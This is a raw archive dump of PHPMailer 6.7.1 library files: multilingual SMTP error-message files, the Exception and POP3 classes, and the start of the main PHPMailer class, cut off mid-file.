त्रुटि। '; $PHPMAILER_LANG['variable_set'] = 'चर को बना या संशोधित नहीं किया जा सकता। '; $PHPMAILER_LANG['extension_missing'] = 'एक्सटेन्षन गायब है: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-sr_latn.php000064400000003426151032724670022435 0ustar00 * @author Miloš Milanović */ $PHPMAILER_LANG['authenticate'] = 'SMTP greška: autentifikacija nije uspela.'; $PHPMAILER_LANG['connect_host'] = 'SMTP greška: povezivanje sa SMTP serverom nije uspelo.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP greška: podaci nisu prihvaćeni.'; $PHPMAILER_LANG['empty_message'] = 'Sadržaj poruke je prazan.'; $PHPMAILER_LANG['encoding'] = 'Nepoznato kodiranje: '; $PHPMAILER_LANG['execute'] = 'Nije moguće izvršiti naredbu: '; $PHPMAILER_LANG['file_access'] = 'Nije moguće pristupiti datoteci: '; $PHPMAILER_LANG['file_open'] = 'Nije moguće otvoriti datoteku: '; $PHPMAILER_LANG['from_failed'] = 'SMTP greška: slanje sa sledećih adresa nije uspelo: '; $PHPMAILER_LANG['recipients_failed'] = 'SMTP greška: slanje na sledeće adrese nije uspelo: '; $PHPMAILER_LANG['instantiate'] = 'Nije moguće pokrenuti mail funkciju.'; $PHPMAILER_LANG['invalid_address'] = 'Poruka nije poslata. Neispravna adresa: '; $PHPMAILER_LANG['mailer_not_supported'] = ' majler nije podržan.'; $PHPMAILER_LANG['provide_address'] = 'Definišite bar jednu adresu primaoca.'; $PHPMAILER_LANG['signing'] = 'Greška prilikom prijave: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Povezivanje sa SMTP serverom nije uspelo.'; $PHPMAILER_LANG['smtp_error'] = 'Greška SMTP servera: '; $PHPMAILER_LANG['variable_set'] = 'Nije moguće zadati niti resetovati promenljivu: '; $PHPMAILER_LANG['extension_missing'] = 'Nedostaje proširenje: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-pt_br.php000064400000005237151032724670022103 0ustar00 * @author Lucas Guimarães * @author Phelipe Alves * @author Fabio Beneditto * @author Geidson Benício Coelho */ $PHPMAILER_LANG['authenticate'] = 'Erro de SMTP: Não foi possível autenticar.'; $PHPMAILER_LANG['buggy_php'] = 'Sua versão do PHP é afetada por um bug que por resultar em messagens corrompidas. Para corrigir, mude para enviar usando SMTP, desative a opção mail.add_x_header em seu php.ini, mude para MacOS ou Linux, ou atualize seu PHP para versão 7.0.17+ ou 7.1.3+ '; $PHPMAILER_LANG['connect_host'] = 'Erro de SMTP: Não foi possível conectar ao servidor SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'Erro de SMTP: Dados rejeitados.'; $PHPMAILER_LANG['empty_message'] = 'Mensagem vazia'; $PHPMAILER_LANG['encoding'] = 'Codificação desconhecida: '; $PHPMAILER_LANG['execute'] = 'Não foi possível executar: '; $PHPMAILER_LANG['extension_missing'] = 'Extensão não existe: '; $PHPMAILER_LANG['file_access'] = 'Não foi possível acessar o arquivo: '; $PHPMAILER_LANG['file_open'] = 'Erro de Arquivo: Não foi possível abrir o arquivo: '; $PHPMAILER_LANG['from_failed'] = 'Os seguintes remetentes falharam: '; $PHPMAILER_LANG['instantiate'] = 'Não foi possível instanciar a função mail.'; $PHPMAILER_LANG['invalid_address'] = 'Endereço de e-mail inválido: '; $PHPMAILER_LANG['invalid_header'] = 'Nome ou valor de cabeçalho inválido'; $PHPMAILER_LANG['invalid_hostentry'] = 'hostentry inválido: '; $PHPMAILER_LANG['invalid_host'] = 'host inválido: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer não é suportado.'; $PHPMAILER_LANG['provide_address'] = 'Você deve informar pelo menos um destinatário.'; $PHPMAILER_LANG['recipients_failed'] = 'Erro de SMTP: Os seguintes destinatários falharam: '; $PHPMAILER_LANG['signing'] = 'Erro de Assinatura: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() falhou.'; $PHPMAILER_LANG['smtp_code'] = 'Código do servidor SMTP: '; $PHPMAILER_LANG['smtp_error'] = 'Erro de servidor SMTP: '; $PHPMAILER_LANG['smtp_code_ex'] = 'Informações adicionais do servidor SMTP: '; $PHPMAILER_LANG['smtp_detail'] = 'Detalhes do servidor SMTP: '; $PHPMAILER_LANG['variable_set'] = 'Não foi possível definir ou redefinir a variável: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-pt.php000064400000003541151032724670021414 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'Erro do SMTP: Não foi possível realizar a autenticação.'; $PHPMAILER_LANG['connect_host'] = 'Erro do SMTP: Não foi possível realizar ligação com o servidor SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'Erro do SMTP: Os dados foram rejeitados.'; $PHPMAILER_LANG['empty_message'] = 'A mensagem no e-mail está vazia.'; $PHPMAILER_LANG['encoding'] = 'Codificação desconhecida: '; $PHPMAILER_LANG['execute'] = 'Não foi possível executar: '; $PHPMAILER_LANG['file_access'] = 'Não foi possível aceder o ficheiro: '; $PHPMAILER_LANG['file_open'] = 'Abertura do ficheiro: Não foi possível abrir o ficheiro: '; $PHPMAILER_LANG['from_failed'] = 'Ocorreram falhas nos endereços dos seguintes remententes: '; $PHPMAILER_LANG['instantiate'] = 'Não foi possível iniciar uma instância da função mail.'; $PHPMAILER_LANG['invalid_address'] = 'Não foi enviado nenhum e-mail para o endereço de e-mail inválido: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer não é suportado.'; $PHPMAILER_LANG['provide_address'] = 'Tem de fornecer pelo menos um endereço como destinatário do e-mail.'; $PHPMAILER_LANG['recipients_failed'] = 'Erro do SMTP: O endereço do seguinte destinatário falhou: '; $PHPMAILER_LANG['signing'] = 'Erro ao assinar: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() falhou.'; $PHPMAILER_LANG['smtp_error'] = 'Erro de servidor SMTP: '; $PHPMAILER_LANG['variable_set'] = 'Não foi possível definir ou redefinir a variável: '; $PHPMAILER_LANG['extension_missing'] = 'Extensão em falta: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-fi.php000064400000003303151032724670021363 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'SMTP Greška: Neuspjela autentikacija.'; $PHPMAILER_LANG['connect_host'] = 'SMTP Greška: Ne mogu se spojiti na SMTP poslužitelj.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP Greška: Podatci nisu prihvaćeni.'; $PHPMAILER_LANG['empty_message'] = 'Sadržaj poruke je prazan.'; $PHPMAILER_LANG['encoding'] = 'Nepoznati encoding: '; $PHPMAILER_LANG['execute'] = 'Nije moguće izvršiti naredbu: '; $PHPMAILER_LANG['file_access'] = 'Nije moguće pristupiti datoteci: '; $PHPMAILER_LANG['file_open'] = 'Nije moguće otvoriti datoteku: '; $PHPMAILER_LANG['from_failed'] = 'SMTP Greška: Slanje s navedenih e-mail adresa nije uspjelo: '; $PHPMAILER_LANG['recipients_failed'] = 'SMTP Greška: Slanje na navedenih e-mail adresa nije uspjelo: '; $PHPMAILER_LANG['instantiate'] = 'Ne mogu pokrenuti mail funkcionalnost.'; $PHPMAILER_LANG['invalid_address'] = 'E-mail nije poslan. Neispravna e-mail adresa: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer nije podržan.'; $PHPMAILER_LANG['provide_address'] = 'Definirajte barem jednu adresu primatelja.'; $PHPMAILER_LANG['signing'] = 'Greška prilikom prijave: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Spajanje na SMTP poslužitelj nije uspjelo.'; $PHPMAILER_LANG['smtp_error'] = 'Greška SMTP poslužitelja: '; $PHPMAILER_LANG['variable_set'] = 'Ne mogu postaviti varijablu niti ju vratiti nazad: '; $PHPMAILER_LANG['extension_missing'] = 'Nedostaje proširenje: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-zh_cn.php000064400000003170151032724670022070 0ustar00 * @author young * @author Teddysun */ $PHPMAILER_LANG['authenticate'] = 'SMTP 错误:登录失败。'; $PHPMAILER_LANG['connect_host'] = 'SMTP 错误:无法连接到 SMTP 主机。'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP 错误:数据不被接受。'; $PHPMAILER_LANG['empty_message'] = '邮件正文为空。'; $PHPMAILER_LANG['encoding'] = '未知编码:'; $PHPMAILER_LANG['execute'] = '无法执行:'; $PHPMAILER_LANG['file_access'] = '无法访问文件:'; $PHPMAILER_LANG['file_open'] = '文件错误:无法打开文件:'; $PHPMAILER_LANG['from_failed'] = '发送地址错误:'; $PHPMAILER_LANG['instantiate'] = '未知函数调用。'; $PHPMAILER_LANG['invalid_address'] = '发送失败,电子邮箱地址是无效的:'; $PHPMAILER_LANG['mailer_not_supported'] = '发信客户端不被支持。'; $PHPMAILER_LANG['provide_address'] = '必须提供至少一个收件人地址。'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP 错误:收件人地址错误:'; $PHPMAILER_LANG['signing'] = '登录失败:'; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP服务器连接失败。'; $PHPMAILER_LANG['smtp_error'] = 'SMTP服务器出错:'; $PHPMAILER_LANG['variable_set'] = '无法设置或重置变量:'; $PHPMAILER_LANG['extension_missing'] = '丢失模块 Extension:'; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-id.php000064400000003715151032724670021370 0ustar00 * @author @januridp * @author Ian Mustafa */ $PHPMAILER_LANG['authenticate'] = 'Kesalahan SMTP: Tidak dapat mengotentikasi.'; $PHPMAILER_LANG['connect_host'] = 'Kesalahan SMTP: Tidak dapat terhubung ke host SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'Kesalahan SMTP: Data tidak diterima.'; $PHPMAILER_LANG['empty_message'] = 'Isi pesan kosong'; $PHPMAILER_LANG['encoding'] = 'Pengkodean karakter tidak dikenali: '; $PHPMAILER_LANG['execute'] = 'Tidak dapat menjalankan proses: '; $PHPMAILER_LANG['file_access'] = 'Tidak dapat mengakses berkas: '; $PHPMAILER_LANG['file_open'] = 'Kesalahan Berkas: Berkas tidak dapat dibuka: '; $PHPMAILER_LANG['from_failed'] = 'Alamat pengirim berikut mengakibatkan kesalahan: '; $PHPMAILER_LANG['instantiate'] = 'Tidak dapat menginisialisasi fungsi surel.'; $PHPMAILER_LANG['invalid_address'] = 'Gagal terkirim, alamat surel tidak sesuai: '; $PHPMAILER_LANG['invalid_hostentry'] = 'Gagal terkirim, entri host tidak sesuai: '; $PHPMAILER_LANG['invalid_host'] = 'Gagal terkirim, host tidak sesuai: '; $PHPMAILER_LANG['provide_address'] = 'Harus tersedia minimal satu alamat tujuan'; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer tidak didukung'; $PHPMAILER_LANG['recipients_failed'] = 'Kesalahan SMTP: Alamat tujuan berikut menyebabkan kesalahan: '; $PHPMAILER_LANG['signing'] = 'Kesalahan dalam penandatangan SSL: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() gagal.'; $PHPMAILER_LANG['smtp_error'] = 'Kesalahan pada pelayan SMTP: '; $PHPMAILER_LANG['variable_set'] = 'Tidak dapat mengatur atau mengatur ulang variabel: '; $PHPMAILER_LANG['extension_missing'] = 'Ekstensi PHP tidak tersedia: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-fr.php000064400000005444151032724670021404 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'SMTP грешка: Не може да се удостовери пред сървъра.'; $PHPMAILER_LANG['connect_host'] = 'SMTP грешка: Не може да се свърже с SMTP хоста.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP грешка: данните не са приети.'; $PHPMAILER_LANG['empty_message'] = 'Съдържанието на съобщението е празно'; $PHPMAILER_LANG['encoding'] = 'Неизвестно кодиране: '; $PHPMAILER_LANG['execute'] = 'Не може да се изпълни: '; $PHPMAILER_LANG['file_access'] = 'Няма достъп до файл: '; $PHPMAILER_LANG['file_open'] = 'Файлова грешка: Не може да се отвори файл: '; $PHPMAILER_LANG['from_failed'] = 'Следните адреси за подател са невалидни: '; $PHPMAILER_LANG['instantiate'] = 'Не може да се инстанцира функцията mail.'; $PHPMAILER_LANG['invalid_address'] = 'Невалиден адрес: '; $PHPMAILER_LANG['mailer_not_supported'] = ' - пощенски сървър не се поддържа.'; $PHPMAILER_LANG['provide_address'] = 'Трябва да предоставите поне един email адрес за получател.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP грешка: Следните адреси за Получател са невалидни: '; $PHPMAILER_LANG['signing'] = 'Грешка при подписване: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP провален connect().'; $PHPMAILER_LANG['smtp_error'] = 'SMTP сървърна грешка: '; $PHPMAILER_LANG['variable_set'] = 'Не може да се установи или възстанови променлива: '; $PHPMAILER_LANG['extension_missing'] = 'Липсва разширение: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-mn.php000064400000004212151032724670021377 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'SMTP შეცდომა: ავტორიზაცია შეუძლებელია.'; $PHPMAILER_LANG['connect_host'] = 'SMTP შეცდომა: SMTP სერვერთან დაკავშირება შეუძლებელია.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP შეცდომა: მონაცემები არ იქნა მიღებული.'; $PHPMAILER_LANG['encoding'] = 'კოდირების უცნობი ტიპი: '; $PHPMAILER_LANG['execute'] = 'შეუძლებელია შემდეგი ბრძანების შესრულება: '; $PHPMAILER_LANG['file_access'] = 'შეუძლებელია წვდომა ფაილთან: '; $PHPMAILER_LANG['file_open'] = 'ფაილური სისტემის შეცდომა: არ იხსნება ფაილი: '; $PHPMAILER_LANG['from_failed'] = 'გამგზავნის არასწორი მისამართი: '; $PHPMAILER_LANG['instantiate'] = 'mail ფუნქციის გაშვება ვერ ხერხდება.'; $PHPMAILER_LANG['provide_address'] = 'გთხოვთ მიუთითოთ ერთი ადრესატის e-mail მისამართი მაინც.'; $PHPMAILER_LANG['mailer_not_supported'] = ' - საფოსტო სერვერის მხარდაჭერა არ არის.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP შეცდომა: შემდეგ მისამართებზე გაგზავნა ვერ მოხერხდა: '; $PHPMAILER_LANG['empty_message'] = 'შეტყობინება ცარიელია'; $PHPMAILER_LANG['invalid_address'] = 'არ გაიგზავნა, e-mail მისამართის არასწორი ფორმატი: '; $PHPMAILER_LANG['signing'] = 'ხელმოწერის შეცდომა: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'შეცდომა SMTP სერვერთან დაკავშირებისას'; $PHPMAILER_LANG['smtp_error'] = 'SMTP სერვერის შეცდომა: '; $PHPMAILER_LANG['variable_set'] = 'შეუძლებელია შემდეგი ცვლადის შექმნა ან შეცვლა: '; $PHPMAILER_LANG['extension_missing'] = 'ბიბლიოთეკა არ არსებობს: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-mg.php000064400000003366151032724670021401 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'Hadisoana SMTP: Tsy nahomby ny fanamarinana.'; $PHPMAILER_LANG['connect_host'] = 'SMTP Error: Tsy afaka mampifandray amin\'ny mpampiantrano SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP diso: tsy voarakitra ny angona.'; $PHPMAILER_LANG['empty_message'] = 'Tsy misy ny votoaty mailaka.'; $PHPMAILER_LANG['encoding'] = 'Tsy fantatra encoding: '; $PHPMAILER_LANG['execute'] = 'Tsy afaka manatanteraka ity baiko manaraka ity: '; $PHPMAILER_LANG['file_access'] = 'Tsy nahomby ny fidirana amin\'ity rakitra ity: '; $PHPMAILER_LANG['file_open'] = 'Hadisoana diso: Tsy afaka nanokatra ity file manaraka ity: '; $PHPMAILER_LANG['from_failed'] = 'Ny adiresy iraka manaraka dia diso: '; $PHPMAILER_LANG['instantiate'] = 'Tsy afaka nanomboka ny hetsika mail.'; $PHPMAILER_LANG['invalid_address'] = 'Tsy mety ny adiresy: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer tsy manohana.'; $PHPMAILER_LANG['provide_address'] = 'Alefaso azafady iray adiresy iray farafahakeliny.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP Error: Tsy mety ireo mpanaraka ireto: '; $PHPMAILER_LANG['signing'] = 'Error nandritra ny sonia:'; $PHPMAILER_LANG['smtp_connect_failed'] = 'Tsy nahomby ny fifandraisana tamin\'ny server SMTP.'; $PHPMAILER_LANG['smtp_error'] = 'Fahadisoana tamin\'ny server SMTP: '; $PHPMAILER_LANG['variable_set'] = 'Tsy azo atao ny mametraka na mamerina ny variable: '; $PHPMAILER_LANG['extension_missing'] = 'Tsy hita ny ampahany: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-et.php000064400000003320151032724670021374 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'SMTP Viga: Autoriseerimise viga.'; $PHPMAILER_LANG['connect_host'] = 'SMTP Viga: Ei õnnestunud luua ühendust SMTP serveriga.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP Viga: Vigased andmed.'; $PHPMAILER_LANG['empty_message'] = 'Tühi kirja sisu'; $PHPMAILER_LANG["encoding"] = 'Tundmatu kodeering: '; $PHPMAILER_LANG['execute'] = 'Tegevus ebaõnnestus: '; $PHPMAILER_LANG['file_access'] = 'Pole piisavalt õiguseid järgneva faili avamiseks: '; $PHPMAILER_LANG['file_open'] = 'Faili Viga: Faili avamine ebaõnnestus: '; $PHPMAILER_LANG['from_failed'] = 'Järgnev saatja e-posti aadress on vigane: '; $PHPMAILER_LANG['instantiate'] = 'mail funktiooni käivitamine ebaõnnestus.'; $PHPMAILER_LANG['invalid_address'] = 'Saatmine peatatud, e-posti address vigane: '; $PHPMAILER_LANG['provide_address'] = 'Te peate määrama vähemalt ühe saaja e-posti aadressi.'; $PHPMAILER_LANG['mailer_not_supported'] = ' maileri tugi puudub.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP Viga: Järgnevate saajate e-posti aadressid on vigased: '; $PHPMAILER_LANG["signing"] = 'Viga allkirjastamisel: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() ebaõnnestus.'; $PHPMAILER_LANG['smtp_error'] = 'SMTP serveri viga: '; $PHPMAILER_LANG['variable_set'] = 'Ei õnnestunud määrata või lähtestada muutujat: '; $PHPMAILER_LANG['extension_missing'] = 'Nõutud laiendus on puudu: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-lt.php000064400000003133151032724670021405 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'SMTP klaida: autentifikacija nepavyko.'; $PHPMAILER_LANG['connect_host'] = 'SMTP klaida: nepavyksta prisijungti prie SMTP stoties.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP klaida: duomenys nepriimti.'; $PHPMAILER_LANG['empty_message'] = 'Laiško turinys tuščias'; $PHPMAILER_LANG['encoding'] = 'Neatpažinta koduotė: '; $PHPMAILER_LANG['execute'] = 'Nepavyko įvykdyti komandos: '; $PHPMAILER_LANG['file_access'] = 'Byla nepasiekiama: '; $PHPMAILER_LANG['file_open'] = 'Bylos klaida: Nepavyksta atidaryti: '; $PHPMAILER_LANG['from_failed'] = 'Neteisingas siuntėjo adresas: '; $PHPMAILER_LANG['instantiate'] = 'Nepavyko paleisti mail funkcijos.'; $PHPMAILER_LANG['invalid_address'] = 'Neteisingas adresas: '; $PHPMAILER_LANG['mailer_not_supported'] = ' pašto stotis nepalaikoma.'; $PHPMAILER_LANG['provide_address'] = 'Nurodykite bent vieną gavėjo adresą.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP klaida: nepavyko išsiųsti šiems gavėjams: '; $PHPMAILER_LANG['signing'] = 'Prisijungimo klaida: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP susijungimo klaida'; $PHPMAILER_LANG['smtp_error'] = 'SMTP stoties klaida: '; $PHPMAILER_LANG['variable_set'] = 'Nepavyko priskirti reikšmės kintamajam: '; //$PHPMAILER_LANG['extension_missing'] = 'Extension missing: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-eo.php000064400000003201151032724670021365 0ustar00 * @author Jim Jagielski (jimjag) * @author Andy Prevost (codeworxtech) * @author Brent R. Matzelle (original founder) * @copyright 2012 - 2020 Marcus Bointon * @copyright 2010 - 2012 Jim Jagielski * @copyright 2004 - 2009 Andy Prevost * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License * @note This program is distributed in the hope that it will be useful - WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. */ namespace PHPMailer\PHPMailer; /** * PHPMailer exception handler. * * @author Marcus Bointon */ class Exception extends \Exception { /** * Prettify error message output. * * @return string */ public function errorMessage() { return '' . htmlspecialchars($this->getMessage(), ENT_COMPAT | ENT_HTML401) . "
\n"; } } PHPMailer/vendor/phpmailer/phpmailer/src/POP3.php000064400000027743151032724670015631 0ustar00 * @author Jim Jagielski (jimjag) * @author Andy Prevost (codeworxtech) * @author Brent R. Matzelle (original founder) * @copyright 2012 - 2020 Marcus Bointon * @copyright 2010 - 2012 Jim Jagielski * @copyright 2004 - 2009 Andy Prevost * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License * @note This program is distributed in the hope that it will be useful - WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. */ namespace PHPMailer\PHPMailer; /** * PHPMailer POP-Before-SMTP Authentication Class. * Specifically for PHPMailer to use for RFC1939 POP-before-SMTP authentication. * 1) This class does not support APOP authentication. * 2) Opening and closing lots of POP3 connections can be quite slow. If you need * to send a batch of emails then just perform the authentication once at the start, * and then loop through your mail sending script. Providing this process doesn't * take longer than the verification period lasts on your POP3 server, you should be fine. * 3) This is really ancient technology; you should only need to use it to talk to very old systems. * 4) This POP3 class is deliberately lightweight and incomplete, implementing just * enough to do authentication. * If you want a more complete class there are other POP3 classes for PHP available. * * @author Richard Davey (original author) * @author Marcus Bointon (Synchro/coolbru) * @author Jim Jagielski (jimjag) * @author Andy Prevost (codeworxtech) */ class POP3 { /** * The POP3 PHPMailer Version number. * * @var string */ const VERSION = '6.7.1'; /** * Default POP3 port number. * * @var int */ const DEFAULT_PORT = 110; /** * Default timeout in seconds. * * @var int */ const DEFAULT_TIMEOUT = 30; /** * POP3 class debug output mode. * Debug output level. * Options: * @see POP3::DEBUG_OFF: No output * @see POP3::DEBUG_SERVER: Server messages, connection/server errors * @see POP3::DEBUG_CLIENT: Client and Server messages, connection/server errors * * @var int */ public $do_debug = self::DEBUG_OFF; /** * POP3 mail server hostname. * * @var string */ public $host; /** * POP3 port number. * * @var int */ public $port; /** * POP3 Timeout Value in seconds. * * @var int */ public $tval; /** * POP3 username. * * @var string */ public $username; /** * POP3 password. * * @var string */ public $password; /** * Resource handle for the POP3 connection socket. * * @var resource */ protected $pop_conn; /** * Are we connected? * * @var bool */ protected $connected = false; /** * Error container. * * @var array */ protected $errors = []; /** * Line break constant. */ const LE = "\r\n"; /** * Debug level for no output. * * @var int */ const DEBUG_OFF = 0; /** * Debug level to show server -> client messages * also shows clients connection errors or errors from server * * @var int */ const DEBUG_SERVER = 1; /** * Debug level to show client -> server and server -> client messages. * * @var int */ const DEBUG_CLIENT = 2; /** * Simple static wrapper for all-in-one POP before SMTP. * * @param string $host The hostname to connect to * @param int|bool $port The port number to connect to * @param int|bool $timeout The timeout value * @param string $username * @param string $password * @param int $debug_level * * @return bool */ public static function popBeforeSmtp( $host, $port = false, $timeout = false, $username = '', $password = '', $debug_level = 0 ) { $pop = new self(); return $pop->authorise($host, $port, $timeout, $username, $password, $debug_level); } /** * Authenticate with a POP3 server. * A connect, login, disconnect sequence * appropriate for POP-before SMTP authorisation. * * @param string $host The hostname to connect to * @param int|bool $port The port number to connect to * @param int|bool $timeout The timeout value * @param string $username * @param string $password * @param int $debug_level * * @return bool */ public function authorise($host, $port = false, $timeout = false, $username = '', $password = '', $debug_level = 0) { $this->host = $host; //If no port value provided, use default if (false === $port) { $this->port = static::DEFAULT_PORT; } else { $this->port = (int) $port; } //If no timeout value provided, use default if (false === $timeout) { $this->tval = static::DEFAULT_TIMEOUT; } else { $this->tval = (int) $timeout; } $this->do_debug = $debug_level; $this->username = $username; $this->password = $password; //Reset the error log $this->errors = []; //Connect $result = $this->connect($this->host, $this->port, $this->tval); if ($result) { $login_result = $this->login($this->username, $this->password); if ($login_result) { $this->disconnect(); return true; } } //We need to disconnect regardless of whether the login succeeded $this->disconnect(); return false; } /** * Connect to a POP3 server. * * @param string $host * @param int|bool $port * @param int $tval * * @return bool */ public function connect($host, $port = false, $tval = 30) { //Are we already connected? if ($this->connected) { return true; } //On Windows this will raise a PHP Warning error if the hostname doesn't exist. //Rather than suppress it with @fsockopen, capture it cleanly instead set_error_handler([$this, 'catchWarning']); if (false === $port) { $port = static::DEFAULT_PORT; } //Connect to the POP3 server $errno = 0; $errstr = ''; $this->pop_conn = fsockopen( $host, //POP3 Host $port, //Port # $errno, //Error Number $errstr, //Error Message $tval ); //Timeout (seconds) //Restore the error handler restore_error_handler(); //Did we connect? if (false === $this->pop_conn) { //It would appear not... $this->setError( "Failed to connect to server $host on port $port. errno: $errno; errstr: $errstr" ); return false; } //Increase the stream time-out stream_set_timeout($this->pop_conn, $tval, 0); //Get the POP3 server response $pop3_response = $this->getResponse(); //Check for the +OK if ($this->checkResponse($pop3_response)) { //The connection is established and the POP3 server is talking $this->connected = true; return true; } return false; } /** * Log in to the POP3 server. * Does not support APOP (RFC 2828, 4949). * * @param string $username * @param string $password * * @return bool */ public function login($username = '', $password = '') { if (!$this->connected) { $this->setError('Not connected to POP3 server'); return false; } if (empty($username)) { $username = $this->username; } if (empty($password)) { $password = $this->password; } //Send the Username $this->sendString("USER $username" . static::LE); $pop3_response = $this->getResponse(); if ($this->checkResponse($pop3_response)) { //Send the Password $this->sendString("PASS $password" . static::LE); $pop3_response = $this->getResponse(); if ($this->checkResponse($pop3_response)) { return true; } } return false; } /** * Disconnect from the POP3 server. */ public function disconnect() { // If could not connect at all, no need to disconnect if ($this->pop_conn === false) { return; } $this->sendString('QUIT' . static::LE); // RFC 1939 shows POP3 server sending a +OK response to the QUIT command. // Try to get it. Ignore any failures here. try { $this->getResponse(); } catch (Exception $e) { //Do nothing } //The QUIT command may cause the daemon to exit, which will kill our connection //So ignore errors here try { @fclose($this->pop_conn); } catch (Exception $e) { //Do nothing } // Clean up attributes. $this->connected = false; $this->pop_conn = false; } /** * Get a response from the POP3 server. * * @param int $size The maximum number of bytes to retrieve * * @return string */ protected function getResponse($size = 128) { $response = fgets($this->pop_conn, $size); if ($this->do_debug >= self::DEBUG_SERVER) { echo 'Server -> Client: ', $response; } return $response; } /** * Send raw data to the POP3 server. * * @param string $string * * @return int */ protected function sendString($string) { if ($this->pop_conn) { if ($this->do_debug >= self::DEBUG_CLIENT) { //Show client messages when debug >= 2 echo 'Client -> Server: ', $string; } return fwrite($this->pop_conn, $string, strlen($string)); } return 0; } /** * Checks the POP3 server response. * Looks for for +OK or -ERR. * * @param string $string * * @return bool */ protected function checkResponse($string) { if (strpos($string, '+OK') !== 0) { $this->setError("Server reported an error: $string"); return false; } return true; } /** * Add an error to the internal error store. * Also display debug output if it's enabled. * * @param string $error */ protected function setError($error) { $this->errors[] = $error; if ($this->do_debug >= self::DEBUG_SERVER) { echo '

';
            foreach ($this->errors as $e) {
                print_r($e);
            }
            echo '
'; } } /** * Get an array of error messages, if any. * * @return array */ public function getErrors() { return $this->errors; } /** * POP3 connection error handler. * * @param int $errno * @param string $errstr * @param string $errfile * @param int $errline */ protected function catchWarning($errno, $errstr, $errfile, $errline) { $this->setError( 'Connecting to the POP3 server raised a PHP warning:' . "errno: $errno errstr: $errstr; errfile: $errfile; errline: $errline" ); } } PHPMailer/vendor/phpmailer/phpmailer/src/PHPMailer.php000064400000536333151032724670016671 0ustar00 * @author Jim Jagielski (jimjag) * @author Andy Prevost (codeworxtech) * @author Brent R. Matzelle (original founder) * @copyright 2012 - 2020 Marcus Bointon * @copyright 2010 - 2012 Jim Jagielski * @copyright 2004 - 2009 Andy Prevost * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License * @note This program is distributed in the hope that it will be useful - WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. */ namespace PHPMailer\PHPMailer; /** * PHPMailer - PHP email creation and transport class. * * @author Marcus Bointon (Synchro/coolbru) * @author Jim Jagielski (jimjag) * @author Andy Prevost (codeworxtech) * @author Brent R. Matzelle (original founder) */ class PHPMailer { const CHARSET_ASCII = 'us-ascii'; const CHARSET_ISO88591 = 'iso-8859-1'; const CHARSET_UTF8 = 'utf-8'; const CONTENT_TYPE_PLAINTEXT = 'text/plain'; const CONTENT_TYPE_TEXT_CALENDAR = 'text/calendar'; const CONTENT_TYPE_TEXT_HTML = 'text/html'; const CONTENT_TYPE_MULTIPART_ALTERNATIVE = 'multipart/alternative'; const CONTENT_TYPE_MULTIPART_MIXED = 'multipart/mixed'; const CONTENT_TYPE_MULTIPART_RELATED = 'multipart/related'; const ENCODING_7BIT = '7bit'; const ENCODING_8BIT = '8bit'; const ENCODING_BASE64 = 'base64'; const ENCODING_BINARY = 'binary'; const ENCODING_QUOTED_PRINTABLE = 'quoted-printable'; const ENCRYPTION_STARTTLS = 'tls'; const ENCRYPTION_SMTPS = 'ssl'; const ICAL_METHOD_REQUEST = 'REQUEST'; const ICAL_METHOD_PUBLISH = 'PUBLISH'; const 